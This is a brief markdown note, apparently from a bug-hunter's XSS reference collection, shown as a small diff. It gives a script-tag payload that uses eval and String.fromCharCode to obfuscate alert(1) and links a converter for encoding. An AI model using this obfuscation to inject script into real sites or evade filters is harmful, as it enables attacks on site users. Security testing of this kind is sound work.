sneakerhax/TTPs/Bug_Hunting/XSS/xss.md

 ```<script>eval(String.fromCharCode(97,108,101,114,116,40,39,49,39,41))</script> ```

-Using eval and String.fromCharCode to encode/obfuscate alert(1)
+Using eval and String.fromCharCode to encode/obfuscate alert(1).
+Converter can be found [here](http://www.binaryhexconverter.com/ascii-text-to-decimal-converter)